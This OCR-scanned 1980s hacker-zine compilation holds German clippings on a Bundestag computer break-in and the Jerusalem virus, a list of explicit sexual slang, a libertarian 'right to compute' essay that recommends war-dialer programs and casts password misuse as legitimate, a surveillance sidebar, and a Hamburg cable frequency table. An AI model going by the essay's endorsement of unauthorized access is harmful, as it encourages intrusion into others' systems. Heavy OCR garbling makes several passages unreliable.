tagabend bis Donnerstagmorgen ohne 
Pause, um den im Programm versteckten 
Fehler aufzuspüren und zu beheben Am 
Mittwochabend gegen 21 Uhr funktionier¬ 
ten die Frankfurter Computer-Terminals 
wieder, ab Donnerstagmorgen lief der 
Betrieb im ganzen Bundesgebiet wie pp 
wohnt §<2 

Demnächst in New York- 
Ein Restaurant mit Video iiri 
Tisch: Der Bildschirm zeigt die 
stets aktuelle Speisekarte und 
auf Wunsch auch Videospiele 
Bestem und gespielt wird mit 
dem Joystick: eih Computer- 
Drucker am Ausgang liefert die 
Rectoung - und bestätigt den 
High Score, also den erzielten 
Punktestand bei den Spielen. 


kub 





5- 

CKT 


Der nächtliche Daten-Einbruch 


Von Almut Hauenschild 


Hacker-Premiere im Deutschen Bun¬ 
destag. Der Grüne Abgeordnete Jo Müller 
knackte den CDU-Computer. „Versehent¬ 
lich", wie der Bremer Alternative versi¬ 
chert. Es war die Nacht vor Silvester und 
um die Geisterstunde. Im Bonner Abge- 
ordneten-Hochhaus „Tulpenfeld" leuchte¬ 
te im linken Flügel der vierten Etage ein 
einsames Fenster. Jo Müller bastelte an 
einer Wahlrede und durchforstete den 
fraktionseigenen Computer nach brauch¬ 
baren grünen Thesen. 

Aber was da plötzlich auf dem Bild¬ 
schirm erschien, kannte er aus keinem 
Beschluß grüner Parteitage. Doch ganz so 
fremd war es für ihn auch wieder nicht. 
Das klang doch wie aus Geißlers Mund. Er 
probierte mit allerlei Codeworten den 
Adressaten zu ermitteln. „Ich sag jetzt nur 
mal so zum Beispiel, mit dem Code Hel¬ 
mut oder Hannelore“, erzählt Müller, 
„denn den richtigen Code kann ich ja aus 
Datenschutzgründen nicht weitersagen.“ 


Und da hätte ihm der Rechner ganz brav 
verraten, daß er einer derer von Wang ist 
und in der Parteizentrale der Christunion 
stehe. 

Gleich am nächsten Tag schrieb Mül¬ 
ler seinem nächtlichen Gesprächspartner: 
„Dein Datensicherungssystem arbeitet 
ebenso zuverlässig wie die Sicherheitssy¬ 
steme von Atomkraftwerken: ab und zu 
entweicht etwas... Daß jedoch auch das 
von deinen biologischen Endgeräten ( = 
Programmierern) noch zusätzlich instal¬ 
lierte Paßwortsystem dich schutzlos läßt, 
hat uns enttäuscht. Noch stärker entrü¬ 
stet waren wir allerdings über den Inhalt 
einiger Textdateien. Angesichts der diffa¬ 
mierenden Qualität dieser Texte solltest 
du dich deiner Mitarbeit in dieser unseriö¬ 
sen Organisation schämen." 

Und die Parteien-Oberen im Konrad- 
Adenauer-Haus ließ Müller wissen: „Es ist 
beschämend, daß ihr euch so leichtfertig 
ein amerikanisches System angeschafft 



habt, wo doch jeder weiß, daß die deut 
sehen Hersteller preiswertere und bess»^ 
Systeme anbieten...“ sere 

Die EDV-Experten in der CDU woUpn 
mcht sojecht an den nächtlichen DaW 
Einbruch glauben. Parteisprecher Jür^^' 
Mersehmeier erklärte, daß der Grüne 
geordnete „möglicherweise alles 
sich aber nicht im Computersystem 
CDU-Zentrale befunden hat". Dkß 
ler aber nachts um ein Uhr noch arl^u 
„verdient ein Fleißkärtchen, wahWi ’ 
von Jutta Ditfurth oder von Otto Schilv 
Sollte der Abgeordnete Müller sich län " ’ 
re Zeit in unserem Computersystem a T 
gehalten haben, könnten wir ihm 
nur gratulieren, weil er politische Bild,^'* 
genießen konnte. Im übrigen gehen 
aber bis zum Beweis des Gegenteils 
aus, daß es sich bei den Behauptun 
weder um Hardware noch Software 
dem um eine zu früh gestartete Silvö^-P^' 
Ente handelt.“ “^‘‘vester- 




(Vu-i : nr>ft- Ü=^tCT7i\ Q ( V^65) 


OFFENSIVE LANGUAGE 
VIA COMPUTER 

Reinhold Aman 


Computer networks can be used to gather Information from 
throughout the world. Unlike in traditionaJ fieldwork, one 
does not have to interview informants personally but simply 
posts a query, or an eiitire questionnaire, on the electronic 
bullelin board (BB^, and the users respond. BB’s make this 
novel way of collecting data and responding easy; one Ccills 
the BB’s number and leaves onc’s response. The quality 
and ränge of the responses depend on the precision of the 
questions asked, as well as on the type of user. Naturally, 
one can ask only those who have a Computer and modern, 
which severely restricts the field of informants. However, 
these informants can gather information locaJly from those 
lacking such equipment and send it to the BB. 

Henry Birdseye’s “The Unknown BBS” -^00 i 

is such a system for collecting information. It runs 
at 300 and 1200 baud and contains about one-quarter 
million characters’ worth of kakological riddles, jokes, and 
other offensive language. It can be reached 24 hours a day 
by calling (303) 088 81^. ^ S IZ") € - 807?. 

To test the usefulness of his System, Mr. Birdseye asked 
his BB users about terms for masturbation, urination, and 
vomiting. He did not request other essential information 
from the informants, such as their sex, age, geographic loca- 
tion, education, profession, etc., but the simple data below 
prove that such a BB system can be used successfully. To 
transmit the information gathered to others, one can either 
call up the BB and download it (have it sent by telephone 
to one’s own Computer), or ask for a printout, which I did. 


Following below are the terms, after organizing and alpha- 
betizing the raw data. 

to masturbate (of females): beat the beaver, buttonhole, 
clap your clit, cook cucumbers, grease the gash, hide the 
hotdog, hit the slit, hose your hole, Juice your sluice, make 
waves [from “the (little) man in the boat” = clitoris?], pet 
the poodle, slam the dam, stump-jump. 

to masturbate (of males): beat the bishop, beat your litde 
brother, beat the meat, burp the worm, butter your corn, 
choke the chicken, clean your rifle, consult Dr. Jerkoff, 
crank your shank, dink your slinky, feel in your pocket for 
your big hairy rocket, file your fun-rod, fist your mister, 
flex your sex, flog the dolphin, flog your dog, grease your 
pipe, hack your mack, hump your hose, Jerkin’ the gherkin, 
milk the chicken, Onan’s Olympics (n.), one-stick drum 
Improvisation (n,), pack your palm, paint your ceiling, play 
a flute solo on your meat whistle, play the male organ, 
please your pisser, point your socid flnger, polish your 
sword, pound the pud, pound your flounder, prompt your 
porpoise, prune the fifth limb, puU the pope, pull your taffy, 
run your hand up the flagpole, shine your pole, shoot the 
tadpoles, slakin’ the bacon, slam your hammer, slam your 
Spam, slap your wapper, spank the monkey, spank the 
Salami, strike the pink match, stroke the dog, stroke your 
poker, talk with Rosy Palm and her five little sisters, tickle 
your pickle, thump your pumper, tweak your twinkie, 
unclog the pipes, varnish your pole, walk the dog, watch 
the eyelid movies, wax your dolphin, whip your dripper, 
whizzin’jizzum, wonk your conker, yang your wang, yank 
the yam, yank your crank. 

to urinate: bleed the liver, drain the dragon, drain the 
(main) vein, get rid of the bladder matter, siphon the 
python, visit Miss Murphy. 

to vomit: drive the big white bus, hug the porcelain, 
kneel before the porcelain throne, pray to the porcelain 
gods, school lunch rerun (n.), technicolor rerun (n.), 
upchuck. 


Wegen jugendgefährdenden Inhalts sind 
bis Ende 1987 im Bundesgebiet 64 Compu¬ 
ter- und Telespiele auf den Index gesetzt, 
worden. 



t. Computer im Sterben 


Von HENRY KOEHLERT 
Man sieht es nicht, man fiechl es nicht und kein Ex-1 
perte konnte es aufholten-ein „Kilier-Programm" | 
hot sich wie ein Virus in den Zentrol-Computer der | 
Oniversitot von jerusolem eingenislet und zersiött 
dort noch und noch olle gespeicherten For¬ 
schungsergebnisse. Computer-Cnef Israel Rodoi 
errechneie: „Wenn a//es so weher geht, werden 
am li, Mai alle Systeme zusammenbrechen '' Oos 
heißt: Oer Comouter stirbt. 


Und: Uber dos weltweite Oatenoustouschsy- 
Stern EARN kann sich dos „KiHer-Progremm" aus 
Israel auch in unsere deutschen Forschungs-Com¬ 
puter (rund 200) «inschleichen und ouch dort 
ipoten vernichten. Weltweit sind 6000 Großrechnet 
in Gefohr, 

..Alles begann om 29. Dezember. Isroel Rodai: 
„Uber 30 Assistenten und Professoren merkten es 
gleichzeitiq. Plötzlich brauchte der Computer für 
einfoche Rechenaufgaben in Biologie, Chemie 


und Physik langer. Dauerte früher ein Rechenvor 
gong drei Minuten, sind’s jetzt 15 Minuten. Täglich 
wirderlangsamer." 

Was war passiert? Ein Saboteur (Hacker) hotte 
olle Sicherungen des Computers (Codewörter) 
Überwunden und sein „Kilier-Programm'' einge- 
tippt. Radai: „Dos Programm wirkt wie eine Zeit¬ 
bombe. Erst wenn manaO Minuten rechnet, wird es 
oktiv. In das System einer Hondelsbonk und bei 
zwei Versicherungen ist es auch schon eingedrun¬ 


gen. Der verheerendste Pall von Sabotage.” Dos 
„Killer-Pfogromm" konn sogor schon unentdeckl in 
deutschen Computern schlummern, weil olle Gro߬ 
rechner über Telefonleitungen miteinonder ver- 

bundehsind. 


Plötzlich alle Daten weg? 


Professor Andreos Reuter (38). Direktor des 
Stuttgorier Informolik-Instituts: „Doten. die wii 
gestern errechnet haben, könnten heute plötzlich 
weg sein." Manfred Reitberger (i8). Leiter des 
Rechenzentfums am Mox-PIanck-institut Mün¬ 
chen; „An unserem Rechner hängen alle Uni- 
Computer der Stadt. Wir haben unsere Benutzer 
gewarnt“ 










by Mtchaei E. Marotta 



“A wcll-informed citizenry being essen¬ 
tial to ihe betterment of our rcpublic, the 
right of the peoplc to own and use 
Computers shall not be abridged.” 

(proposed Amendment to the Constitution) 

Your Computer is your newest tool for securing 
and expanding your freedom. While earlier ages 
gave real political and economic power to those who 
rode horses or wore armor or carried firearms, 
today, real power is wielded by those who can use a 
Computer. 

The “Computer revolution” is all but over. If you 
do not know how to use a Computer, you are 
illiterate. If you can't write a program, you are poor 
in a society where Information is wealth. If you can’t 
follow a menu or a manual, you are isolated in a 
World of mass communication, 

Over the last 30 years, we have experienced a 
rapid acccleration of this trend toward an economy 
driven by the transfer of information. 

A fisherman uses his Computer to keep track of 
his Catches. Over the years he has used BASIC, 
Visi-Calc and now dBase III to build a database 
which includes the date of the catch, the species, 
weight and length of the fish, the water 
temperature, air temperature and pressure, and the 
iure or bait. 

A farmer has just bought a used personal 
Computer and a new herd management program. Hc 
knows that it will be years before he and his sons will 
be able to go back over the accumulated data to set a 
proper course for the management of their land and 
livestock over the next 12 years. In the meantirae, 
they calculate their incomes and expenses on a 
monthly basis. And the youngest leams the ABCs 
with a Sesame Street diskette. 

Using a personal Computer, a financial analyst 
can keep track of: the New York Stock Exchange; 
the American Stock Exchange; several regional 
stock exchanges; Comdex (Commodities Exchan¬ 
ge); London and Hong Kong Gold; Fannie Mac, 
Ginnie Mae, Sallie Mae; Treasury Balance and T- 



Bill rates; and more. Most important is the fact t ha t 
this analyst can run these raw data through various 
economctric models to test for short and long-tcrm 
trends, seek out maximum profits from interest 
rates and brokerage fees, and rainimize taxation by 
cotnparing Investments in different States and 
nations. 



“The 'Computer revolution'is all 
but over. If you do not know 
how to use a Computer, you are 
illiterate. ” 



Toda^ we are witnessing the culmination of a 
trend. Personal Computing is now a “given ” 
Someone who lives frugally can purchase a useri 
r '.mputer with a CRT, 48k of RAM, and two sinaU 
aensity dnves for about S200. A person who 

employed at a high-tech or unionized jobeanafford 
the same level of Computer power enjoyed bv 
corporations and governments. We are at a staee in 
history where the average individual can be a data 
Processing center. ^ 

Naturally, governments don’t want this tn 
happen. 


In Britain, the government now requires everyone 
with a database to inform the State of what data 
they hold and how they got it. The law was passed 
(ostcnsibly) to protect people from unauthorized 
transfer of data about them by private organi 
zations. Of course, the law does not apply to the 
government. ® 


While such dracontan measures are not ncces- 
sarily part of America’« future, some trends can 
easily push us into a fascist society. For one thini» 
the clcction of a rightwing, church-oriented pre^I 
dent (or vice president, sincc this could come about 
as an internal compromise) could dcfinitely be the 
springboard which would give Congress the excusc 












to pass laws which seriously restrictfreedom of data 
Processing. Rightwing Christians are Professional 
snoopcrs. “Pornographie” Software, Computer dat- 
ing Services, mailing iists of people who read 
“dangerous” books or rent “dirty” Videos, and so on 
will be their targets. 

Also, liberals are notoriously prejudiced against 
private enterprise. If anything like the British 
database law will come to pass, it will be because 
social activists legislate against “invasion of pri- 
vacy” by individuals with access to data. 

A victory in the 1988 election by a liberal can have 
grave consequences. Given the strength of the “draft 
lacocca” movement, it is likely that even if he 
himself doesn’t run these people will have a great 
deal to say in any future Democratic admini- 
stration. Price Controls, Import restrictions and 
anti-Japanese sentiments will have a devastating 
effect on the affordability of Computer hardware. 

Judging from the boards used in today’s Apples, 
IBM-PCs, and DEC VT240s, about 10% of the 
Chips used in American Computers are made in El 
Salvador. Democratic administrations are notor¬ 
iously soft on communism and this source of 
Computer hardware could dry up by 1990. 



“While earlier ages gave real 
political and economicpower to 
those who rode horses or wore 
armor or carried firearms, to- 
day, real power is wielded by 
those who can use a Computer. ” 


On the domestic front, major corporations and 
govemment bodies have been arguing about what 
kind of “Computer crime” law should be enacted. 
Note that they are not discussing whetherhMX what 
and when. The Michigan Computer law of 1979 
makes it a possible felony to even “attempt to 
access... any Computer System... or Computer 
Software... without authorization.” Yet “authori- 
zation” is never defined. Later this can be 
interpreted to mcan “permission from the 
govemment.” Federal laws wiU soon be passed 
which foUow the same reasoning; right now they 
are arguing over the specific language. 

Another thfeat to personal computing comes 
from labor unions. Düring the Fall of 1985, the CBS 
network show 60 Minuies ran a Segment called 
“Homework” about people (women, mostly) who 
make garments at home and seil them to wholesalers 
and Jobbers. The manufacture of womcn’s (though 
not men’s) garments is regulated by the federal labor 
boards at the hebest of the International Ladies' 
Carment Workers’ Union. The Union has been 
actively harassing people who make women’s 
clothes at home. A wholesaler told the newsguy that 
this is just the first Step, that the next step will be the 
direct regulation of all home businesses, for instance 
the Computer Software industry. When asked if this 
were true, a union official said in fact that going 
after the home-based Computer Software industry is 
a high priority! 


Even within the Computer industry there are those 
who have sold out to the Dark Side of the Force. In 
January of 1986, PC World carried a quote from 
Kevin Jenkins the chief at Hercules Computer 
Technology. According to Jenkins, the idea that the 
Computer “expands your freedom” and “opens up 
new areas of human potential” is just a bunch of 
“new wave... nonsense” promulgated by Steve Jobs, 
the co-fdunder of Apple Computers. Jenkins is 
clcarly a crypto-fascist who would side with 
governments and unions to regulate you and your 
Computer. 

In the Summer of 1985, Michael Brown applied to 
the Software Publishers Association for an award 
based on sales of his program. The independent 
auditing team reviewed his books and he was slated 
to receive a gold-plated plaque for selling over 
100,000 units of “Copy II.” Then the Software 
Publishers Association attempted- to take back the 
award. “Copy II” is a program that copies other 
programs. Part of its functionality is the fact that it 
can break copy-protection schemes. The Software 
Publishers Association Claims that this leads to 
millions of dollars of lost sales. However, many 
users need to break such protection in order to make 
archival back-ups of their disks. 

Michael Brown settled out of court. He got moral 
suppon from throughout the Software industry. 
However, the^ Software Publishers Association can 
be expccted to act like socialists when it cotnes to 
protecting their interests. A free marketeer, Michael 
Brown set aside $180,000 for his defense fund. 
Verifying the “tragedy of the commons,” the SPA 
could only gamer $50,000. (The “tragedy of the 
commons” is that while “all” may benefit from 
something, each will .only pay in no more than they 
must to use a “common resource.”) The SPA must 
out of necessity tum to the govemment if they hope 
to keep their monopoly on Software Publishing. 

In September of 1986, Software industry leaders, 
Ashton-Tate, Microsoft and Adapso (The Assoc- 
ation of Data Processing Organizations), announc- 
ed that they will no longer copy-protect Software. 
Said Microsoft President, Bill Gates, “The customer 
won.” Piracy in the 1500s and 1600s was ca used by 
nationalist wars and mcrcantilist tariffs. The 
success of pirates on the high seas led to the era of 
laissez faire. So, too, has Software piracy led to 
admüsion by somc ttat force of law is inferior to 
the realitics of the marketplace. 

The free market impels toward excellence. 
Michael Brown (creator of “Copy 11”) said that his 
firm fights piracy by frequently improving their 
Software. Only paying customers can be notified of 
Updates. 

And yet, there is no end to the list of people who 
would limit or deny your right to compute. You 
must be ready to defend what rights you want and to 
extend those rights however possible. The alter¬ 
native is ignorance. 

In Order to defend your right to compute, all of 
your data flies should be protccted with encryption. 
On the one hand, a crypto-system which rests on 
known, historical methods can be relativcly easy to 
crack. On the Otter hand, there are so many 
algorithms, each with a host of variations, that 
almost any method for secure communication will 
do the Job. The home Computer makes it very easy to 
switch among a dozen schemes. 



^“Copy ir is a program that 
copies other programs. Part of 
Hs functionality is thefact that it 
can break copy-protectionsche- 
mes, The Software Publishers 
Association Claims that this 
leads to millions of dollars of 
lost sales. ” 


The availability of bulletin-board Software is your 
key to rapid and secure communication. Bulletin¬ 
board Software allows your home Computer to 
function as a message center. Some Communi¬ 
cations packages, such as Shareware s RBBS-PC, 
arc excellcnt for in-bound messages; othcß, such as 
Hayes “SmartCom II,” are ideal for dialing out. It 
mattere little which Software you choose. The 
important thing is to get it and use it. Would you 
rather rely onthe U.S. Postal Service to provide you 
with rapid and secure communication? 

In defense of your right to process data, you need 
to develop the kind of mentality that creates a login 
routine which asks for the day of the week. If you 
answer with the day of the week, the Computer shuts 
down; the proper response is your aunt’s maiden 
name. This is the modern way to fight unwarranted 
search and seizure. 

You can set up a secure bulletin board system and 
announcc it to those with whom you would share 
data. Survival Information, analysis of economic 
and political news, Information about life-extension 
and more can be available to you and a handful of 
friends you may never meet face-to-face. 


The public key crypto-system developed at 
Stanford by Merkle, Hellman and Diffie was 
broken by Adi Shamir. Working at the Wcizmann 
Institute in Israel, Shamir was continuing the 
investigations begun with Rivest and Adlemann at 
MIT on public key cryptosystems. At a crypto- 
system Conference held in Santa Barbara, Calif¬ 
ornia, Adlemann demonstrated Shamir’s work 
using an Apple II Computer. 


‘TÄe availability of bulletin- 
board Software is your key to 
rapid and secure communica¬ 
tion. Bulletin-board Software 
allows your home Computer to 
function as a message center. ” 


The Stanford public key system was broken by 
the brilliant mathematical insights of a single 
person. The Stanford people have in tum targetted 
the Data Encryption Algorithm devised for the 
Department of Commerce’s Bureau of Standards. 
The algorithm is supposed to be used by all banks 
and other federal institutions (for instance, it is used 
to transfer Air Force paychecks). However, the U.S. 
Government does not allow the DEA to be used for 
even the lowest level of military security. 

The team at Stanford has set a price of $5 million 
to build a machine with enough parallel processors 
to take apart DEA transmissions in less than a day. 

Clearly, no cryptosystem is completely secure 
However, it is possible to devise secure mcans for 
communication that are unambiguous, easy to use 
and difficult to break. 


“Piracy in the 1500s and 1600s 
was caused by nationalist wars 
and mercantilist tariffs. The 
success of pirates on the high 
seas led to the era of laissez 
faire. So, too, has Software 
piracy led to admission by some 
that force of law is inferior to 
the realities of the market- 
place. ” 


‘TOll can set up a secure bulletin 
board system and announce it 
to those with whom you would 
share data. Survival Inform¬ 
ation, analysis of economic and 
political news, Information 
about life-extension and more 
can be available to you and a 
handful of friends you may 
never meet face-to-face. ” 


Realize that given unlimited time and resources, 
any code or cipher can be broken. However, welfare 
department case workers and alcOhol tax agents are 
govemment employees; their ability to follow ob- 
vious clues to a logical conclusion is limited. On the 
other hand, if the stakes are high enough the federal 
govemment will devote incredible resources in a 
brüte force or “tempest” attack. 



The “dictionary code” meets these criteria. Those 
who would communicate securely decide upon one 
or more books which all own. The Christian Bible 
the Oxford English Dictionary, or an encyclopediä 
are obvious choices. Obscure editions of fairy tales 
nursery rhymes or geology texts could also serve as 
Code dictionaries. 




Scientific researchers who collaborate long dis- 
tance will be forccd to rely on some Standard (and 
well-known texts) since books like the Bible don’t 
have the word “microscopc” and even the Encyclo- 
pedia Brittanica is woefuUy short on material about 
the behavior of the hydroxyl ion’s valance electron 
during cellular respiration. Nonetheless, a personal 
Computer can be programmed to issue new 
dictionaries where the key words (for molecules, or 
stock market issues, or bullet calibers) are constant 
and the codes (number or letter groups) change 
frequently. 

Should anyone try to intercept or monitor these 
Communications, it could take years, if not decades, 
to unscramble the encoded messages and it could 
run into millions of dollars. Consider that there are 
still battlefield ciphers from World War II that have 
never been decrypted. Üt is no longer worth the 
effort. These ciphers succeeded in their purpose to 
hold secure a transmission. 

Realize that your right to process data means 
more than just encrypting your mailing lists. Since 
your tax money pays for the collection of govem- 
ment data, you have a right to that Information. If 
you own stock in a Corporation, you have a right to 
the information created or discovered by that Joint 
stock Company. You have a right to any information 


‘*Thefact is that freedom of the 
press would be meaningless ifit 
were limited to a narrow inter- 
pretation such that the State 
cannot sehe a printing press 
without a court Order. Tele- 
communications and desktop 
Publishing are the active ex- 
pressions of what Ben Franklin 
had in mind 200 years ago. ” 


which can adversely affect your life. It is a matter of 
seif defense to know what Chemicals are put into the 
water you drink and who puts them there. 

Furthermore, you have a right to transmit what 
you know. Yet there are government prosecutors 
who Chase “pornographers” and reporters from 
television stations by claiming that “freedom of the 


STATErOF-THE^ARTSURVEILLANCE 

Ustenng devkiM can M bdR bito the walls of th« 
embassy. lipafTaiigeinentof Steel rekifordi« rods ' S« 

orcon^ahapedcavhiesisMdden bl the Walls. vl 

MIcrawaves are beamedat the Walls, and a b< 

computerized recelver diff erentiates how the w 

frequencyof themlcrowavesismodulatedby the ci 

Impact of die volces on the 
Steel rods and cavKIes. 


Sowid and words cause vdndows bl the room to 
vibrate. A laser beam is (Urected at the wlndow. The 
beam Is reflected and pIcks IV the vibratlons of the 
wfaidow. A Computer then reads the beam and 
converts it back into sound. 


















press” is limited to those who own photo-offset 
lithographic presses. 

The fact is that freedom of the press would be 
meaningless if it were limited to a narrow interpre- 
tation such that the State cannot seize a printing 
press without a court order. Telecommunications 
and desktop Publishing are the active expressions of 
what Ben Franklin had in mind 200 years ago. 
What, after all, is a “newspaper?” Consider that the 
Wall Street Journal is typeset electronically and 
broadcast via satellitc to several printing plants 
around the world. How is this different from a 
homebrew buUetin board System? In Michigan’s 
Capital City, The Lansing State Journal gets its state 
government reporting from the Associated Press 
wire Service. If they have a right to gather news 
electronically, then so do you. You have every 
reason to go beyond the narrow limits iraposed by 
the powers that be. 

“Auto-dialer” programs enable your Computer to 
search for other data processing machines. The' 
Computer Underground, written by M. Harry 
(Loompanics, 1986) has a listing for an auto-dialer 
program for Apple Computers. MegaSoft (PO Box 
1080, Battle Ground, WA 98604) sells an “auto- 
dialer” for Commodore Computers; the “War 
Games Auto-Dialer” costs about $30. 

In Order to realize the füllest possible bcnefits 
from the Computer revolution, it is nccessary to 
adopt an attitude which is open and expansive in 
regard to data processing. A feudalist world of 
ultra-secure Computers and data fortresses is 
contrary to the spirit of data processing. 

Every era has its ruling dass, and the nature of the 
ruling dass is detcrmincd by the technology of the 
era. Formerly, men on horses wearing armor mied. 
Later it was pcoplc who could design and produce 
industrial goods. Today peoplc who own or can use 
electronic data processing equipraent are the new 
ruling dass. Call them the “Datalords.” 

In each age, the ruling dass tailors the law to suit 
its own ends. Düring times of transition, the 


^^^fo^ay~peopkyvho^vnorcM 
use electronic data processing 
eguipment are the new ruling 
dass. Call them 'Datalords. 


Innovators must fight against an established order 
as they develop their own worldviews. The best 
example in Western Civilization is the existence of 
real estate laws. Land is called “real” estate because 
you can’t put it on a horse and carry it out from 
under the control of the king. It is called real "estate” 
because title to it comes “ex-state,” i.e., from the 
state. The king can grant titles; the king can revoke 
titlcs. 

The advent of capitalism brought about a legal 
System that recognized the ownership of a drop- 
forge without a deed certified by a governmental 
unit or a title search performcd by a government 
licensee. 


The cybemetic revolution will require a legal 
System which supports the view that while a 
machine is still property in the capitalist sense, the 
data in the machine is regulated by new laws that 
better suit its nature. 

Consider that silver and gold are “static** 
Commodities. There is a fixed and known amount of 
each on Earth and the materials are universally 
useful to humans. Wheatandlumberare“dynamic’’ 
Commodities. The amount of each is determined by 
the demand. Thedemand is universal and the supply 
is limited by economic factors which control the 
amount of land and human effort available to 
produce wheat and lumber. No onc will refuse a free 
loaf of bread. Data is a “fluid” commodity. It can be 
produced in super-abundance. It can be copied. 
Copying data does not destroy it. (There is no way 
to copy gold or wheat.) Moreover, unlike bread and 
gold, data is not universally useful. 

In the Christian Bible, there is a story about a 
shepherd boy named David who defeats a giant 
named Goliath. At one point in the story, the king 
offers David his royal armor to wear into battle. The 
Bible teils of how the boy David trudgcs back and 
forth, trying the burdensome metal plate. David 
respectfully declines the offer, trusting in his god 
to protect him. Now you know this cutc story. 
you use the data? 


“The cybemetic revolution will 
require a legal System which 
Supports the view that while a 
machine is still property in the 
capitalist sense, the data in the 
machine is regulated by new 
laws that better suit its nature. ” 


On Thursday, October 9, 1986, Nissan Motors 
over-the-puntcr stock was bid at while the 
asking price was IYa. Can you use that information? 

Consider the E.F. Hutton economist who in late 
1982 relied on his old Federal Reserve System 
Computer password to discover moncy supply 
figures. The Fed announces these figures weekly and 
the amount of paper in circulation has a direct effect 
on intcrest ratcs. Knowing in advance what the 
moncy supply would be announced to be, the man 
from E.F. Hutton was able to trade profitably on 
behalf of his employers. Time magazine for 
January 13, 1983, called this “Filching Figures." 
However, it is clear that nothing was “filched;" the 
figures still rcsidcd in the machines. What the 
government (and Time) objected to was the fact 
that this individual didn’t wait for some lackey to 
read the data from a cue card at a press Conference. 

In his book Electronic Life, author and screen- 
writer, Michael Crichton, states that it is inherent in 
the technology of both computing and video to copy 
and transfer information. Himself a big eamer of 
Copyright royalties, Crichton says that the present 
System is archaic. In his novel The Shockwave 
Rider, John Brunner makes a case for opening all 
government data flies. 




There is a real good reason why selling stock in a 
Company is called “going public.” Does your electric 
Utility Company have a right to privacy that prevents 
you from accessing and auditing its books? As a 
stockholder in a major Corporation, don’t you have 
a right to know about the Company? Why doesn’t 
your local manufacturer release to you the Inform¬ 
ation they have already provided the U.S. Patent 
Office or OSHA? 

Similarly, your state’s wildlife department has 
land-use data which can help you find a homestead 
or a campsite or a ski-slope. The department of 
transportation Computers can warn you in advance 
of where holiday traffic accidents have occurred 
over the last 10 ycars. The state treasury can show 
you how much you, your employer or your neighbor 
has paid in taxes. 

Go out there and get that data!! 

The Libertarian E-Mail Directory is available from 
Dan Tobias, 4025 Golf Links BIvd Apt. 340, 
Shreveport, LA 71109, for $3.00. It coniains the 
personal names and datapath names for about 40 
iibertarians using ARPA, CompuServe, Delphi, 
Internet, and other electronic mail Systems. 


aus: Loompanics Catalog '87 


person who is employed at a 
high’tech or unionized job can 
afford the same level of Com¬ 
puter power enjoyed by corp- 
oraüons and governments. We 
are at a stage in history where 
the average individual can be a 
data Processing center. ” 


A FINAL NOTE — In November of 1986, the Reagatt 
adminstration launched a direct assault on your right to 
process data. Then-security advisor John Poindexter said that 
the government was seeking ways to limit access to PRIVA TE 
DATA BASE SERVICES. This was echoed by Diane 
Fountaine, a Dept. of Defense Speaker at a convention of the 
Information Industry Association. 

Poindexter said that the feds want to stop access to 
information in the PUBLIC DOM AIS which they consider 
“sensitive but unclassified." He targetted data on hazardbus 
materials. Federal Reserve policy, social security and the 
Securities Exchange Commission. 

Founiaine's goals involve restricting access to public 
database Services like Nexis, Dialog and Delphi. The Dept. of 
Defense would have a law which requires database Services to 
“red ßag“ individuals who ask too many questions about so- 
called high tech subjecis like lasers; users who are “red 
ßagged" would have their names turned over to the feds. 

[Mil 












Frequenzverteilung in BK-Hetz Haniburg Mitte 


Kanal Bild 


(O - 

E02 s‘ 48.25 
E03 ? 55.25 

E04 62.25 

_r> _ 

'S- 

- o - 

::: f ::::: 

___ _ 

a> 

___ ^ - 

o 

-j - 

-tS- 

_JB _ 

SU- 


-Qt) 

--- Z 

___ f 

«T> 

- y 

-t>J 

m 

— - I 

--Q 

- a ^ 

S 


S04 ^ 126.25 
305 133.25 

506 140.25 

507 147.25 

308 154.25 

509 161.25 

510 168.25 

E05 175.25 

E06 182.25 

E07 189.25 

EOS 196.25 
E09 203.25 

ElO 210.25 
Eli 217.25 
E12 224.25 

511 231.25 

512 238.25 

513 245.25 

514 252.25 

515 259.25 

516 266.25 

517 273.25 

518 280.25 

519 287.25 

520 294.25 



Ton Empfang Sender 


~ 43.00 
52.75 
o 60.75 
%- 67.75 

203.25 

HH-Moorfleet 


88.05 

103.60 

HH-Moorfleet 

\ 88.80 

95.30 

Schwerin 

5 ; 89.25 

93.10 

HH-Moorfleet 

xr- 89.75 

89.50 

HH-Moorfleet 

I- 90.65 

98.50 

Schwerin 

^ 92.45 

90.30 

HH-Moorfleet 

ni 94.00 

92.20 

HH-Mittelweg 

5 94.75 

87.60 

HH-Moorfleet 

0 95.70 

99.20 

HH-Moorf1eet 

96.15 

100.60 

Rosengarten 

PÖ 96.85 

106.80 

HH-Moorfleet 

1. 97.35 

95.00 

HH-TV-Turm 

o* 9 8.15 

93.80 

Bremen 

99.65 

97.10 

HH-TV-Turm 

^100.30 

92.80 

Schwerin 

100.90 

88.70 

HH-Moorfleet 

101.75 

88.30 

Bremen 

T" 103.30 

0.972 

HH-Moorfleet 

^104.25 

102.90 

Kaltenkirchen 

^ 105.15 

96.70 

Bremen 

ß 106.55 

97.60 

Visselhövede 

J? 107.25 

89.20 

Schwerin 

107.70 

101.20 

Bremen 

131.75 

138.75 

145.75 

152.75 

159.75 

166.75 

535.25 

Schwerin 

173.75 

217.25 

Schwerin 

X 0 u . f 




±0 / . / 0 

194.75 

623.25 

HH-TV-Turm 

201.75 

543.25 

HH-TV-Turm 

^Uö, /D 

215.75 

11500 

EUT 1 -Fl 

222.75 

10970 

INT VA-F12 

229.75 

11080 

EUT 1-Fl 

236.75 

11550 

INT VA-F12 

243.75 

11170 

INT VA-F12 

250.75 

11130 

INT VA-F12 

257.75 

11650 

EUT 1-Fl 

264.75 

11670 

EUT 1-Fl 

271.75 

11470 

EUT 1-Fl 

278.75 

11010 

INT VA-F12 


Frogr an'.r. 
DBP-intern 


ARD (NDR-HH) 

Kabelpilot 

Radio Hamburg 

Stimme der DDR 

NDR 1 - Radio Niedersac 

NDR 1 - Welle Nord 

Berliner Rundfunk 

NDR 1 - Hamburg Welle 

NDR 4 - Gastarbeiter 

NDR 2 

NDR 3 

Radio FFN 

Radio 107 

OK Radio 

Radio Bremen 1 

Radio KORAH 

Radio DDR 2 

DDF 

Radio Bremen 2 

NDR MW 

RSH 

Radio Bremen 3 
BFBS 

Radio DDR 1 
Radio Bremen 4 


DDR 2 
DDR 1 
Testbild 
Testbild 
NDR 3 
ZDF 

DBF Info 
SAT 1 
3 SAT 
RTL plus 
Eins plus 
Bayern 3 
musicbox 
SKY Channel 
SUPER Channel 
TV 5 / Worldnet 
WDR 3 

Kabelpilot 

Kabelpilot 

Eureka 


299.75 


11600 


INT VA-F12 










































A whisper down the line 


Barry Fox with a user’s guide tokphone tapping 


E VERYONE has at some time or 
other been “sure” that their tele- 
